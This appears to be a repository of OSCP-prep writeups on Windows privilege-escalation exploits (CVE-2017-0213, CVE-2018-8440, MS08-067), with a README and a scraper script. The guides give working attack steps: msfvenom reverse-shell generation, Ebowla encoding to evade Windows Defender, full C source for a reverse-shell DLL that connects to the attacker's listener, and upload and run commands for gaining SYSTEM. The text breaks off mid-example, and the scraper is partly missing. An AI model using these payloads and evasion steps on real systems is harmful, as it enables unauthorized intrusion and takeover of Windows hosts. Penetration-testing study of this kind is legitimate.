├── CVE-2017-0213.md
├── CVE-2018-8440.md
├── README.md
├── get_vulns.py
├── ms08-067.md
├── ms09-012.md
├── ms10-059.md
├── ms15-051.md
├── ms16-032.md
├── ms16-075.md
├── ms16-098.md
└── ms17-010.md

--------------------------------------------------------------------------------
/CVE-2017-0213.md:
--------------------------------------------------------------------------------

| CVE / MS | Title | Vulns |
| --------- | ----- | ----- |
| CVE-2017-0213 | Windows COM Aggregate Marshaler Lets Local Users Gain Elevated Privileges | win_10 version_1511, win_10 version_1607, win_10 version_1703, win_10 version_1511 arc_x86, win_10 version_1607 arc_x86, win_10 version_1703 arc_x86, win_7 sp_1, win_7 sp_1 arc_x86, win_8.1, win_8.1 arc_x86, win_server_2008 sp_2, win_server_2008 sp_2 arc_x86, win_server_2008_r2 sp_1, win_server_2008_r2 sp_1 arc_x86, win_server_2012, win_server_2012 arc_x86, win_server_2016, win_server_2016 arc_x86 |

This is my first ever Windows exploit that I modified myself (even though it's just two lines) and compiled! If you haven't done this before, like me, now is a good time to start!

To compile the C++ exploit you will need Microsoft Visual Studio 2015 or later. I am using Microsoft Visual Studio 2019 in this POC.

Make sure to install the C++ workloads and components: "Desktop development with C++", "Universal Windows Platform development" and "C++/CLI support for v142 build tools" for Visual Studio 2019, or "Common tools for Visual C++ 2015", "Microsoft Foundation Classes for C++" and "Windows XP Support for C++" for Visual Studio 2015.

Assuming the installation is done, the next step is to find "vcvarsall.bat" on your Windows machine. In Visual Studio 2019 Community edition this file is located at:

```
C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Auxiliary\Build\vcvarsall.bat
```

In Visual Studio 2015 Community edition it is located at:

```
C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\vcvarsall.bat
```

I am compiling the exploit for an x64 target, so if you are compiling for an x86 target change `amd64` to `x86` in the command below. The compiled exploit must match the target's architecture. (The path in this command is from a Professional edition install; use the path that matches your edition.)

```sh
"C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\VC\Auxiliary\Build\vcvarsall.bat" amd64
```

Running this on your Windows machine should print a message similar to the following, depending on the version you are using:

```sh
**********************************************************************
** Visual Studio 2019 Developer Command Prompt v16.0.0
** Copyright (c) 2019 Microsoft Corporation
**********************************************************************
[vcvarsall.bat] Environment initialized for: 'x64'
```

Now we have access to a command named "cl" in this CMD; it is the Windows counterpart of gcc/g++ and compiles source code to a binary. Don't close this CMD, as we will need it to compile our exploit.
Download the C++ source code from Here. The source does not tell the linker to pull in Advapi32.lib, so the link step fails with unresolved externals until we add the directive. Add the line below at line 61 of the source code:

```cpp
#pragma comment(lib, "Advapi32.lib")
```

Save the file as CVE-2017-0213.cpp and do a test compile to make sure the toolchain actually works. Navigate your CMD to where the exploit file is and execute:

```sh
cl CVE-2017-0213.cpp /EHsc /DUNICODE /D_UNICODE
```

If everything went okay, the output looks like this:

```sh
Microsoft (R) C/C++ Optimizing Compiler Version 19.20.27508.1 for x64
Copyright (C) Microsoft Corporation.  All rights reserved.

CVE-2017-0213.cpp
Microsoft (R) Incremental Linker Version 14.20.27508.1
Copyright (C) Microsoft Corporation.  All rights reserved.

/out:CVE-2017-0213.exe
CVE-2017-0213.obj
```

A file named CVE-2017-0213.exe now exists in the same directory, which means the compilation worked correctly.

If you have a Remote Desktop session on your target machine you can just copy the exe to the target and run it; if the exploit works it spawns another CMD running as SYSTEM.
But if you only have command-line access to the target system, let's modify one more line to make it usable from the command line!

Note: a meterpreter session is needed to execute the binary, because this exploit does not work from a non-interactive shell.
We will create a reverse shell binary with msfvenom and change the exploit to launch it as SYSTEM instead of popping cmd.exe:

```sh
msfvenom -f exe -p windows/x64/shell_reverse_tcp LHOST=<Your-Machine-IP> LPORT=9005 -a x64 -o rev.exe
```

This binary will be deleted immediately on a Windows 10 or Server 2016 box if Windows Defender is active. If you are trying this against a Windows 7 box you do not need to encode the binary and can skip this part. We will obfuscate the exe by encoding it with a tool named "Ebowla" (now deprecated, but it still works) to get past Defender. It requires Go, Python 2 and pip:

```sh
git clone https://github.com/Genetic-Malware/Ebowla.git
pip install configobj
```

The tool is ready to be used. Now edit the "genetic.config" file inside the Ebowla directory, find and change the following variables:

```ini
Encryption_Type = ENV
output_type = GO
payload_type = EXE
```

Find the [[ENV_VAR]] section. Set the value of the "computername" variable to the output of the "hostname" command on your target machine; the payload is keyed on that value, so it has to match the target exactly. Suppose mine is 'tally', so I put it like this:

```ini
username = ''
computername = 'tally'
homepath = ''
homedrive = ''
Number_of_processors = ''
processor_identifier = ''
processor_revision = ''
userdomain = ''
systemdrive = ''
userprofile = ''
path = ''
temp = ''
```

Leave the other variables shown above blank and the rest of the file at its defaults, then save and exit.
Now copy the rev.exe file into the Ebowla directory and execute:

```sh
python ebowla.py rev.exe genetic.config

./build_x64_go.sh output/go_symmetric_rev.exe.go revx.exe
```

This produces an encoded version of the original exe at output/revx.exe which, at the time of writing, was not blocked by Windows Defender. Defender signatures change, so re-check against a lab box before relying on it.
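The reason the config above leaves every [[ENV_VAR]] entry blank except `computername` is environmental keying: the encryption key is derived from the target's environment, so the payload only decrypts on a host whose variables match the values you configured. The block below is an added illustration of that idea, written for this page; it is not Ebowla's code or its actual key-derivation or cipher scheme (Ebowla's key material, normalisation and wrapping format are assumptions here, and the HMAC-SHA256 counter-mode keystream plus tag is a stand-in for a real AEAD cipher). The config and payload bytes are constructed for the example.

```python
import hashlib
import hmac
import os

# Environment variables the writeup's [[ENV_VAR]] section lists. Only the ones
# you fill in (here: COMPUTERNAME) contribute key material.
KEY_VARS = ("USERNAME", "COMPUTERNAME", "HOMEPATH", "HOMEDRIVE", "NUMBER_OF_PROCESSORS",
            "PROCESSOR_IDENTIFIER", "PROCESSOR_REVISION", "USERDOMAIN", "SYSTEMDRIVE",
            "USERPROFILE", "PATH", "TEMP")

def derive_key(expected, env):
    """SHA-256 over the values, read from `env`, of every variable that is non-blank
    in `expected`. Blank config entries are skipped, so they never affect the key.
    Lower-casing is an assumption of this example (Windows hostnames are case-insensitive)."""
    material = b""
    for name in KEY_VARS:
        if expected.get(name):
            material += env.get(name, "").lower().encode() + b"\x00"
    return hashlib.sha256(material).digest()

def keystream(key, length):
    # HMAC-SHA256 in counter mode as a PRF; standard library only.
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]

def wrap(payload, expected):
    """Build step on the attacker box: encrypt under the key derived from the
    *expected* environment and append an integrity tag."""
    key = derive_key(expected, expected)
    ct = bytes(p ^ k for p, k in zip(payload, keystream(key, len(payload))))
    tag = hmac.new(key, ct, hashlib.sha256).digest()
    return ct + tag

def unwrap(blob, expected, env=None):
    """Run step on the target: rederive the key from the live environment and
    return the payload only if the tag verifies. On the wrong host this returns
    None and the payload bytes never appear in memory."""
    env = os.environ if env is None else env
    key = derive_key(expected, env)
    ct, tag = blob[:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, ct, hashlib.sha256).digest()):
        return None
    return bytes(c ^ k for c, k in zip(ct, keystream(key, len(ct))))

# Config from the writeup: everything blank except computername = 'tally'.
CONFIG = {name: "" for name in KEY_VARS}
CONFIG["COMPUTERNAME"] = "tally"

# Constructed stand-in for rev.exe; not a real binary.
PAYLOAD = b"MZ\x90\x00fake-rev-exe-bytes"

if __name__ == "__main__":
    blob = wrap(PAYLOAD, CONFIG)
    print("on tally   :", unwrap(blob, CONFIG, {"COMPUTERNAME": "TALLY", "USERNAME": "bob"}))
    print("on dc01    :", unwrap(blob, CONFIG, {"COMPUTERNAME": "dc01"}))
```

The second call returns None: a wrong hostname gives a wrong key, the tag fails, and nothing is decrypted. That is also why a typo in `computername` produces a binary that silently does nothing on the target.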
Now it's time to modify the command inside the exploit's C++ source so it runs revx.exe instead of firing cmd.exe. Head to line 733 of the source file and change the line to this (the path must match where you upload revx.exe; C:\Users\Public is writable by every user):

```cpp
WCHAR cmdline[] = L"C:\\Users\\Public\\revx.exe";
```

Save the source file as mod.cpp and compile it:

```sh
cl mod.cpp /EHsc /DUNICODE /D_UNICODE
```

Now we have the mod.exe exploit binary. Copy that file to your Linux machine. We will use our meterpreter session to upload mod.exe and revx.exe to the target box (adjust the source file locations if they are not in the same directory):

```sh
meterpreter > upload mod.exe C:\\Users\\Public\\
meterpreter > upload revx.exe C:\\Users\\Public\\
```

Remember we set port 9005 in our rev.exe, so fire up a netcat listener on that port in a different terminal to catch the incoming reverse shell. Now all that is left is to execute mod.exe from the meterpreter session:

```sh
meterpreter > execute -f C:\\Users\\Public\\mod.exe
Process XXXX created.
```

You should see a message like "Process XXXX created." and receive a reverse shell as SYSTEM on your netcat listener!

Note: in case the exploit fails, migrate your meterpreter session to an interactive process and try again.

--------------------------------------------------------------------------------
/CVE-2018-8440.md:
--------------------------------------------------------------------------------

| CVE / MS | Title | Vulns |
| --------- | ----- | ----- |
| CVE-2018-8440 | Microsoft Windows Task Scheduler ALPC Interface Local Privilege Escalation Vulnerability | win_10 version_1607 arc_x64,win_10 version_1607 arc_x86,win_server_2008 sp_2 arc_x64,win_rt arc_x86,win_10 version_1803 arc_x86,win_10 arc_x64,win_server_2012 arc_x86,win_7 sp_1 arc_x64,win_server_2016 arc_x86,win_server_2008 sp_2 arc_x86,win_server_1709 arc_x86,win_8.1 arc_x86,win_server_1803 arc_x86,win_server_2008 sp_1 arc_x64,win_10 version_1803 arc_x64,win_7 sp_1 arc_x86,win_10 arc_x86,win_server_2008 sp_1 arc_x86 |

First, to verify whether this exploit will work, check that the Authenticated Users group has Read+Execute access on the `C:\Windows\Tasks` folder. We can check those permissions using `icacls`:

```sh
PS C:\> icacls C:\Windows\Tasks
C:\Windows\Tasks NT AUTHORITY\Authenticated Users:(RX,WD)
                 BUILTIN\Administrators:(F)
                 BUILTIN\Administrators:(OI)(CI)(IO)(F)
                 NT AUTHORITY\SYSTEM:(F)
                 NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
                 NT AUTHORITY\SYSTEM:(F)
                 CREATOR OWNER:(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files
```

If Authenticated Users have RX we can proceed with the exploit.
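Reading `icacls` output by eye is error-prone once several ACEs per principal are involved, so here is an added example (written for this page, not part of the original writeup) that parses the output and answers the question above programmatically. The two samples are constructed for the example: the first mirrors the output shown above, the second is a hardened variant where Authenticated Users have no ACE on the folder. Entries flagged `(IO)` are inherit-only and apply to children, not the folder itself, so they are ignored.

```python
import re

# Constructed sample in the shape icacls prints: the first line carries the path
# followed by the first ACE; every further ACE is on its own indented line.
SAMPLE_VULNERABLE = r"""C:\Windows\Tasks NT AUTHORITY\Authenticated Users:(RX,WD)
                 BUILTIN\Administrators:(F)
                 BUILTIN\Administrators:(OI)(CI)(IO)(F)
                 NT AUTHORITY\SYSTEM:(F)
                 NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
                 CREATOR OWNER:(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# Constructed hardened variant: Authenticated Users are granted nothing on the folder.
SAMPLE_HARDENED = r"""C:\Windows\Tasks BUILTIN\Administrators:(F)
                 NT AUTHORITY\SYSTEM:(F)

Successfully processed 1 files; Failed processing 0 files
"""

# "<principal>:(flag)(flag)...(rights)" ; rights groups may be comma separated, e.g. (RX,WD)
ACE_RE = re.compile(r'^(?P<principal>.+?):(?P<flags>(?:\([^)]*\))+)\s*$')
INHERIT_FLAGS = {"OI", "CI", "IO", "NP", "I"}
# Simple rights that contain read+execute on the object itself.
IMPLIES_RX = {"F", "M", "RX"}

def parse_icacls(output, path):
    """Return {principal: set(rights)} for ACEs that apply to `path` itself."""
    aces = {}
    for line in output.splitlines():
        line = line.strip()
        if line.startswith(path + " "):        # first line: "<path> <first ACE>"
            line = line[len(path) + 1:]
        m = ACE_RE.match(line)
        if not m:
            continue                           # blank line or the summary line
        tokens = set()
        for group in re.findall(r'\(([^)]*)\)', m.group("flags")):
            tokens.update(t.strip() for t in group.split(","))
        if "IO" in tokens:
            continue                           # inherit-only: applies to children
        aces.setdefault(m.group("principal"), set()).update(tokens - INHERIT_FLAGS)
    return aces

def authenticated_users_rights(output, path=r"C:\Windows\Tasks"):
    return parse_icacls(output, path).get(r"NT AUTHORITY\Authenticated Users", set())

def authenticated_users_have_rx(output, path=r"C:\Windows\Tasks"):
    """True when Authenticated Users hold RX, or a right that contains it, on the folder."""
    return bool(authenticated_users_rights(output, path) & IMPLIES_RX)

if __name__ == "__main__":
    for name, sample in (("vulnerable-looking", SAMPLE_VULNERABLE), ("hardened", SAMPLE_HARDENED)):
        print(name, sorted(authenticated_users_rights(sample)), authenticated_users_have_rx(sample))
```

On a live box, feed it `subprocess.check_output(["icacls", r"C:\Windows\Tasks"], text=True)` instead of the sample; the first sample reports `['RX', 'WD']` and `True`, the hardened one `[]` and `False`.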

Next we need a malicious DLL for the exploit to load and give us what we want: a reverse shell. To generate the DLL, copy the source code below, change <Your-Machine-IP> to your listener's IP and save it as rs.cpp:

```c
#include <winsock2.h>
#include <ws2tcpip.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(lib, "Ws2_32.lib")

/* Listener to connect back to. */
#define REMOTE_ADDR "<Your-Machine-IP>"
#define REMOTE_PORT "443"

void revShell();

/* The shell is spawned straight from DllMain, so the loader lock is held until
   cmd.exe exits. That is fine for this one-shot exploit payload. */
BOOL WINAPI DllMain(HINSTANCE hinstDll, DWORD dwReason, LPVOID lpReserved)
{
    switch(dwReason)
    {
        case DLL_PROCESS_ATTACH:
            revShell();
            break;
        case DLL_PROCESS_DETACH:
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
            break;
    }

    return TRUE;
}

void revShell()
{
    FreeConsole();
    WSADATA wsaData;
    int iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
    struct addrinfo *result = NULL, *ptr = NULL, hints;
    memset(&hints, 0, sizeof(hints));
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;
    hints.ai_protocol = IPPROTO_TCP;
    getaddrinfo(REMOTE_ADDR, REMOTE_PORT, &hints, &result);
    ptr = result;
    /* WSASocket with dwFlags = 0 creates a non-overlapped socket, which is
       required when the socket is handed to cmd.exe as its standard handles. */
    SOCKET ConnectSocket = WSASocket(ptr->ai_family, ptr->ai_socktype, ptr->ai_protocol, NULL, 0, 0);
    connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen);
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));
    /* Point stdin/stdout/stderr of the child at the socket and hide its window. */
    si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_HIDE;
    si.hStdInput = (HANDLE)ConnectSocket;
    si.hStdOutput = (HANDLE)ConnectSocket;
    si.hStdError = (HANDLE)ConnectSocket;
    TCHAR cmd[] = TEXT("C:\\WINDOWS\\SYSTEM32\\CMD.EXE");
    /* bInheritHandles = TRUE so cmd.exe actually inherits the socket handle. */
    CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
    WaitForSingleObject(pi.hProcess, INFINITE);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    freeaddrinfo(result);
    WSACleanup();
}
```

To compile this you need `mingw-w64` installed (`apt install mingw-w64`).

Execute the command below to compile it as a DLL:

```sh
x86_64-w64-mingw32-g++ rs.cpp -o rs.dll -lws2_32 -shared
```

The DLL must be built for the target's architecture, since a 64-bit process cannot load a 32-bit DLL and vice versa; the command above is the x64 build, use `i686-w64-mingw32-g++` for x86. Depending on your target box, download the matching exploit binary:

* [ALPC_DiagHub.x64.exe](https://github.com/realoriginal/alpc-diaghub/raw/master/ALPC_DiagHub.x64.exe)
* [ALPC_DiagHub.x86.exe](https://github.com/realoriginal/alpc-diaghub/raw/master/ALPC_DiagHub.x86.exe)
Upload the exploit binary and rs.dll to the same directory on your target box, start a netcat listener on the port mentioned in the DLL source (443) and execute:

```sh
cmd /c ALPC_DiagHub.x64.exe rs.dll .\lol.rtf
```

You should receive a reverse shell as SYSTEM instantly on your netcat listener.

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------

# Reverse Shell-able Exploit POCs

Sharing the list of Windows exploits I encountered during my preparation for OSCP that didn't require GUI access and can be exploited via a reverse shell.

I wrote a small proof-of-concept writeup for each of them; the affected versions were collected using [this script](get_vulns.py), which I wrote in a quick and dirty way by scraping the Microsoft and CVE websites.

I do not guarantee the accuracy of the information listed here, you know what you are doing best! The suggested approach is to use this wiki after running Windows Exploit Suggester / Sherlock / Watson.

| CVE / MS | Title | Vulns |
| --------- | ----- | ----- |
| [CVE-2017-0213](CVE-2017-0213.md) | Windows COM Aggregate Marshaler Lets Local Users Gain Elevated Privileges | win_10 version_1511, win_10 version_1607, win_10 version_1703, win_10 version_1511 arc_x86, win_10 version_1607 arc_x86, win_10 version_1703 arc_x86, win_7 sp_1, win_7 sp_1 arc_x86, win_8.1, win_8.1 arc_x86, win_server_2008 sp_2, win_server_2008 sp_2 arc_x86, win_server_2008_r2 sp_1, win_server_2008_r2 sp_1 arc_x86, win_server_2012, win_server_2012 arc_x86, win_server_2016, win_server_2016 arc_x86 |
| [CVE-2018-8440](CVE-2018-8440.md) | Microsoft Windows Task Scheduler ALPC Interface Local Privilege Escalation Vulnerability | win_10 version_1607 arc_x64,win_10 version_1607 arc_x86,win_server_2008 sp_2 arc_x64,win_rt arc_x86,win_10 version_1803 arc_x86,win_10 arc_x64,win_server_2012 arc_x86,win_7 sp_1 arc_x64,win_server_2016 arc_x86,win_server_2008 sp_2 arc_x86,win_server_1709 arc_x86,win_8.1 arc_x86,win_server_1803 arc_x86,win_server_2008 sp_1 arc_x64,win_10 version_1803 arc_x64,win_7 sp_1 arc_x86,win_10 arc_x86,win_server_2008 sp_1 arc_x86 |
| [CVE-2008-4250 / MS08-067](ms08-067.md) | Microsoft Windows Server - Code Execution | win_vista sp_1 arc_x64,win_server_2003 arc_x64,win_xp sp_2 arc_x86,win_xp sp_3 arc_x86,win_xp arc_x64,win_server_2003 sp_1 arc_x86,win_server_2008 arc_x64,win_server_2003 sp_2 arc_x86,win_server_2003 sp_2 arc_x64,win_2000 sp_4 arc_x86,win_xp sp_2 arc_x64,win_vista sp_1 arc_x86,win_server_2008 arc_x86 |
| [CVE-2009-0079 / MS09-012](ms09-012.md) | Microsoft Windows Server 2003 - Token Kidnapping Local Privilege Escalation. Churraskito.exe/churrasco.exe | win_2000 sp_4 arc_x86,win_vista sp_1 arc_x86,win_vista sp_1 arc_x64,win_xp sp_2 arc_x64,win_server_2008 arc_x64,win_xp sp_2 sp_3 arc_x86,win_server_2008 arc_x86,win_xp sp_2 arc_x86,win_server_2003 sp_2 arc_x64,win_xp sp_3 arc_x86,win_server_2003 sp_1 sp_2 arc_x86 |
| [CVE-2010-2554 / MS10-059](ms10-059.md) | Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege. Chimichurri.exe | win_server_2008 sp_2 arc_x86,win_vista sp_1 sp_2 arc_x86,win_server_2008 arc_x86,win_10 arc_x86,win_server_2008 arc_x64,win_vista sp_1 sp_2 arc_x64,win_server_2008 sp_2 arc_x64,win_10 arc_x64 |
| [CVE-2015-1701 / MS15-051](ms15-051.md) | ClientCopyImage Win32k | win_vista sp_2 arc_x64,win_8 arc_x64,win_server_2008 sp_2 arc_x64,win_8 arc_x86,win_server_2012 arc_x86,win_server_2003 sp_2 arc_x64,win_server_2008 sp_1 arc_x64,win_8.1 arc_x86,win_8.1 arc_x64,win_10 sp_1 arc_x86,win_server_2008 sp_2 arc_x86,win_vista sp_2 arc_x86,win_server_2003 sp_2 arc_x86,win_10 sp_1 arc_x64,win_server_2008 sp_1 arc_x86 |
| [CVE-2016-0099 / MS16-032](ms16-032.md) | Secondary Logon Handle Privilege Escalation | win_server_2008 sp_2 arc_x64,win_server_2008 sp_1 arc_x64,win_10 arc_x64,win_vista sp_2 arc_x86,win_10 version_1511 arc_x86,win_server_2012 arc_x86,win_7 sp_1 arc_x64,win_10 version_1511 arc_x64,win_server_2008 sp_2 arc_x86,win_10 arc_x86,win_8.1 arc_x86,win_vista sp_2 arc_x64,win_8.1 arc_x64,win_7 sp_1 arc_x86,win_server_2008 sp_1 arc_x86 |
| [MS16-075](ms16-075.md) | Rotten Potato – Privilege Escalation from Service Accounts to SYSTEM (JuicyPotato) | win_server_2008 sp_2 arc_x64,win_server_2008 sp_1 arc_x64,win_10 arc_x64,win_vista sp_2 arc_x86,win_10 version_1511 arc_x86,win_server_2012 arc_x86,win_7 sp_1 arc_x64,win_10 version_1511 arc_x64,win_server_2008 sp_2 arc_x86,win_10 arc_x86,win_8.1 arc_x86,win_vista sp_2 arc_x64,win_8.1 arc_x64,win_7 sp_1 arc_x86,win_server_2008 sp_1 arc_x86 |
| [CVE-2016-3309 / MS16-098](ms16-098.md) | RGNOBJ Integer Overflow on Windows 8.1 x64 bit by abusing GDI objects | win_7 version_1511 arc_x64,win_7 version_1511 arc_x86,win_server_2008 sp_2 arc_x86,win_10 sp_1 arc_x86,win_10 sp_1 arc_x64,win_server_2012 arc_x86,win_7 version_1607 arc_x64,win_vista sp_2 arc_x64,win_8.1 arc_x64,win_server_2008 sp_2 arc_x64,win_7 arc_x64,win_8.1 arc_x86,win_7 arc_x86,win_7 version_1607 arc_x86,win_vista sp_2 arc_x86,win_server_2008 sp_1 arc_x64,win_server_2008 sp_1 arc_x86 |
| [CVE-2017-0144 / MS17-010](ms17-010.md) | Windows SMB Remote Code Execution (Eternalblue) | win_server_2008 sp_1 arc_x64,win_7 version_1511 arc_x64,win_server_2016 arc_x64,win_7 version_1607 arc_x86,win_server_2008 sp_2 arc_x64,win_server_2008 sp_2 arc_x86,win_7 arc_x64,win_vista sp_2 arc_x86,win_8.1 arc_x86,win_10 sp_1 arc_x64,win_server_2008 sp_1 arc_x86,win_10 sp_1 arc_x86,win_vista sp_2 arc_x64,win_7 version_1607 arc_x64,win_7 arc_x86,win_8.1 arc_x64,win_7 version_1511 arc_x86,win_server_2012 arc_x86 |

--------------------------------------------------------------------------------
/get_vulns.py:
--------------------------------------------------------------------------------

```python
#!/usr/bin/env python3
# By Rayhan0x01
import re, requests
from bs4 import BeautifulSoup

headers = {
    "User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
}

def get_vuln_by_cve(cveid):
    # Scrape the "affected products" table of the cvedetails page and normalise
    # each product name into the "win_<ver> sp_<n> version_<n> arc_<x86|x64>" keys
    # used in the README table.
    req = requests.get('https://www.cvedetails.com/cve/CVE-%s/' % cveid, headers=headers)
    soup = BeautifulSoup(req.text, 'html.parser')
    table1 = str(soup.find('table', id="vulnprodstable"))
    os_list1 = re.findall('title=\"Product Details (.*?)\"',table1)
    st = []
    for w in os_list1:
        if w.startswith('Microsoft '):
            w = w.replace('Microsoft ','')
        finalkey = ""
        if w.startswith('Windows 2000'):
            finalkey = "win_2000"
        elif w.startswith('Windows Vista'):
            finalkey = "win_vista"
        elif w.startswith('Windows 7'):
            finalkey = "win_7"
        elif w.startswith('Windows 10'):
            finalkey = "win_10"
        elif w.startswith('Windows XP'):
            finalkey = "win_xp"
        elif w.startswith('Windows 8.1'):
            finalkey = "win_8.1"
        elif w.startswith('Windows 8'):
            finalkey = "win_8"
        elif w.startswith('Windows Server'):
            fname = re.findall('Windows Server (\d+)',w)
            if fname:
                finalkey = "win_server_" + str(fname[0])
            else:
                finalkey = "win_server"   # the original assigned to fname here, leaving finalkey empty
        else:
            # print('Could not extract : %s' % w)
            continue
        if "Service Pack" in w:
            sps = re.findall(r'Service Pack (\d)',w)
            for sp in sps:
                finalkey = finalkey + " " + "sp_" + str(sp)
        elif " SP" in w:
            sps = re.findall(r' SP(\d)',w)
            for sp in sps:
                finalkey = finalkey + " " + "sp_" + str(sp)
        if "Version" in w:
            sps = re.findall(r'Version (\d+) ',w)
            for sp in sps:
                finalkey = finalkey + " " + "version_" + str(sp)
        if "x64" in w:
            finalkey = finalkey + " arc_x64"
        if "x86" in w:
            finalkey = finalkey + " arc_x86"
        elif "32-bit" in w:
            finalkey = finalkey + " arc_x86"
        if "x64" not in finalkey and "x86" not in finalkey:
            # no architecture given: assume the entry applies to both
            st.append(finalkey + " arc_x86")
            st.append(finalkey + " arc_x64")
        else:
            st.append(finalkey)
    st = list(set(st))
    return(st)

def get_vuln_by_bid(bid):
    req = requests.get('https://www.securityfocus.com/bid/%s/info' % bid, headers=headers)
    #soup = BeautifulSoup(req.text,'html.parser')
    src = req.text
    #print(src)
    tdsrc = re.findall('Vulnerable:<\/span>(.*?)',src,re.DOTALL)[0]
    # print(tdsrc)
    oslist = re.findall('Microsoft Windows (.*?)', tdsrc)   # pattern truncated in this copy
    # The rest of this function, and the opening lines of get_vuln_by_msid below
    # (how the bulletin page is fetched into `table1`), did not survive in this copy.

def get_vuln_by_msid(msid):
    table1 = ""   # stand-in: the original fetches the bulletin page here
    os_list1 = re.findall('(.*?)<\/a><\/td>',table1)
    if not os_list1:
        os_list = re.findall('\\n\[(.*?)\]\(',table1)
        os_list1 = [x for x in os_list if '**' not in x and 'Windows' in x]
    if not os_list1:
        os_list = re.findall('(.*?)<\/a>',table1)
        os_list1 = [x for x in os_list if '**' not in x and 'Windows' in x]
    if not os_list1:
        os_list = re.findall('(.*?)',table1)
        os_list1 = [x for x in os_list if '**' not in x and 'Windows' in x]
    st = []
    for w in os_list1:
        finalkey = ""
        if w.startswith('Microsoft Windows 2000'):
            finalkey = "win_2000"
        elif w.startswith('Windows Vista'):
            finalkey = "win_vista"
        elif w.startswith('Windows 7'):
            finalkey = "win_7"
        elif w.startswith('Windows 10'):
            finalkey = "win_10"
        elif w.startswith('Windows XP'):
            finalkey = "win_xp"
        elif w.startswith('Windows 8.1'):
            finalkey = "win_8.1"
        elif w.startswith('Windows 8'):
            finalkey = "win_8"
        elif w.startswith('Windows Server'):
            fname = re.findall('Windows Server (\d+)',w)
            if fname:
                finalkey = "win_server_" + str(fname[0])
            else:
                finalkey = "win_server"   # the original assigned to fname here, leaving finalkey empty
        else:
            # print('Could not extract : %s' % w)
            continue
        if "Service Pack" in w:
            sps = re.findall(r'Service Pack (\d)',w)
            for sp in sps:
                finalkey = finalkey + " " + "sp_" + str(sp)
        elif " SP" in w:
            sps = re.findall(r' SP(\d)',w)
            for sp in sps:
                finalkey = finalkey + " " + "sp_" + str(sp)
        if "Version" in w:
            sps = re.findall(r'Version (\d+) ',w)
            for sp in sps:
                finalkey = finalkey + " " + "version_" + str(sp)
        if "x64" in w:
            finalkey = finalkey + " arc_x64"
        if "x86" in w:
            finalkey = finalkey + " arc_x86"
        elif "32-bit" in w:
            finalkey = finalkey + " arc_x86"
        if "x64" not in finalkey and "x86" not in finalkey:
            finalkey = finalkey + " arc_x86"

        st.append(finalkey)
    st = list(set(st))
    return(st)


print(','.join(get_vuln_by_msid("ms09-012")))
print(','.join(get_vuln_by_bid("105153")))
print(','.join(get_vuln_by_cve("2018-0952")))
```

--------------------------------------------------------------------------------
/ms08-067.md:
--------------------------------------------------------------------------------

| CVE / MS | Title | Vulns |
| --------- | ----- | ----- |
| CVE-2008-4250 / MS08-067 | Microsoft Windows Server - Code Execution | win_vista sp_1 arc_x64,win_server_2003 arc_x64,win_xp sp_2 arc_x86,win_xp sp_3 arc_x86,win_xp arc_x64,win_server_2003 sp_1 arc_x86,win_server_2008 arc_x64,win_server_2003 sp_2 arc_x86,win_server_2003 sp_2 arc_x64,win_2000 sp_4 arc_x86,win_xp sp_2 arc_x64,win_vista sp_1 arc_x86,win_server_2008 arc_x86 |

In order to exploit this vulnerability we will use this Python 2 script: [ms08-067.py](https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py)

This script requires `impacket` and `pycrypto`. They are installed by default in Kali, but if you don't have them already, install them with:

```sh
pip install pycrypto
git clone https://github.com/CoreSecurity/impacket.git
cd impacket && pip install .
```

Next we have to replace the shellcode inside the script. We'll use msfvenom to generate it:

```sh
msfvenom -p windows/shell_reverse_tcp LHOST=<Your-Machine-IP> LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -v shellcode -f py -a x86 --platform windows
```

In the above command `-b` lists the bad characters that must not appear in the shellcode (NUL, LF, CR, backslash, underscore, slash, dot and @). The vulnerable function canonicalises a path, so path-significant bytes would corrupt the payload; msfvenom picks an encoder that avoids them.

Copy the generated shellcode, remove the existing shellcode from lines 54-79 of the script and replace it with yours.
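Before pasting the shellcode into the script it is worth confirming that the encoder really removed every bad character, because a single stray byte means the exploit silently fails. The block below is an added example for this page (not part of the original writeup or of the exploit script): it parses the `shellcode = b""` / `shellcode += b"..."` lines that `-f py -v shellcode` prints, reassembles the bytes and reports any bad-character hits by offset. The two samples are constructed stand-ins of the right shape, not real shellcode.

```python
import re

# Bad characters passed to msfvenom with -b in the step above.
BADCHARS = b"\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40"

# Constructed sample in the shape msfvenom prints for `-f py -v shellcode`
# (real output is a few hundred bytes; these 16 bytes are not real shellcode).
CLEAN_SAMPLE = r'''shellcode =  b""
shellcode += b"\xdb\xc6\xd9\x74\x24\xf4\xbf\x91"
shellcode += b"\x33\xc9\xb1\x52\x31\x7a\x17\x83"
'''

# Same shape with a NUL (0x00) and a slash (0x2f) smuggled in, to show the check firing.
DIRTY_SAMPLE = r'''shellcode =  b""
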